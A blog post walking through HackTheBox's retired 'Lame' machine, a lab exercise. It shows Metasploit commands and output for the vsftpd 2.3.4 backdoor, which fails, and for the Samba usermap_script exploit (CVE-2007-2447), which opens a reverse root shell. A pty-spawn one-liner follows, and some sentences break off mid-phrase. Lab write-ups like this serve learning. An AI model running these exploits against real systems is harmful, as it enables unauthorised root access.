A week after completing my OSCP, I was already having withdrawals and signed up for a VIP account on HackTheBox. A VIP account (roughly $12/month) gives you access to retired machines, as well as a smoother experience overall (less crowded). HTB has been a good resource for me so I don’t mind sending them money. : )
HTB rules say not to write walkthroughs for active boxes, so some of the other boxes I’ve done will have to wait until they’re retired. In the meantime, here’s a walkthrough for one of the easier retired boxes, “Lame”.
Side note: I’m trying to remove the word “lame” from my vocabulary.
This box has been rated on the easier end by HTB community members:
We start off with nmap to discover the open ports. We can see that there’s FTP (port 21), SSH (port 22), and two ports relating to Samba (ports 139 and 445).
One of the first things covered in OSCP was anonymous logins to FTP servers, and FTP was the first thing in the Nmap results, so that’s what I tried first:
Success! I was able to login with username “anonymous” and a blank password… but that’s about as far as that idea got me. I wasn’t able to find or add anything useful. So, on to the next idea.
If we check ExploitDB for the version of vsftpd (“Very Secure” FTP) running on this machine, which is 2.3.4, we find a match!
So, let’s fire up Metasploit (msfconsole) and try it out:
You can use “search vsftpd” to find the exploit that ExploitDB is referencing. Then, “use exploit/unix/ftp/vsftpd_234_backdoor” and “set RHOST 10.10.10.3” to tell Metasploit which machine to target.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > show info

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

Provided by:
  hdm <firstname.lastname@example.org>
  MC <email@example.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  21               yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 0 characters

Description:
  This module exploits a malicious backdoor that was added to the VSFTPD
  download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz
  archive between June 30th 2011 and July 1st 2011 according to the most
  recent information available. This backdoor was removed on July 3rd 2011.

References:
  CVE: Not available
  OSVDB (73573)
  http://pastebin.com/AetT9sS5
  http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
However, it doesn’t work. Womp womp. On to the next idea…
Next, we look at the SSH port… is there anything exploitable here? A search of ExploitDB and Metasploit modules (via “search openssh”) doesn’t turn up anything too promising, so let’s move on to other ideas. If we didn’t have any untested ports left, I might have dug deeper here, or tried to debug the VsFTPd exploit.
In any case, we move on to the remaining two ports, and the “Samba 3.x – 4.x” software running on them.
Searching ExploitDB for “Samba” returns 5 pages of results (!!). Similarly, a search of Metasploit modules returns a ton of options:
We can narrow down the list a bit based on version number (so, anything that doesn’t apply to versions “3.x – 4.x” is out). After that point, we’re still left with a lot of options, so I tend to narrow things down based on the “Rank” in Metasploit, or whether it’s been verified on ExploitDB.
The first “excellent” option, is_known_pipename, says in the Metasploit “show info” blurb that it requires “valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder.” Since we don’t have that… let’s move on to the next option.
The next option is usermap_script, an RCE exploit that does not require any authentication. We set our RHOST to 10.10.10.3:
Then we run the exploit. After avoiding the use of Metasploit in the OSCP labs, doing a one-and-done Metasploit RCE module seems a bit like cheating. That’s probably why this box was marked as easy.
So, it works! The shell we get back is kind of crappy, so I use python -c 'import pty; pty.spawn("/bin/sh")' to make it nicer.
msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.8:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0UfWkKEzrDN9kk2c;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0UfWkKEzrDN9kk2c\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.3:55015) at 2019-05-29 21:07:05 -0400

python -c 'import pty; pty.spawn("/bin/sh")'
sh-3.2# id
id
uid=0(root) gid=0(root)
Luckily for us, we’re already
As with all HTB machines, there are two flags we want to get. One is user.txt in one of the /home/user directories, and the other is root.txt in the
After trying the different folders in the /home directory, we find the user flag at
Then, grabbing the root flag is easy. It’s at
And that’s it! I’m planning on doing more walkthroughs in the future and publishing them as the boxes are retired. 🙂
If you’d like to read more about the Samba vulnerability used to exploit this box, check out CVE-2007-2447 (original Samba.org link here).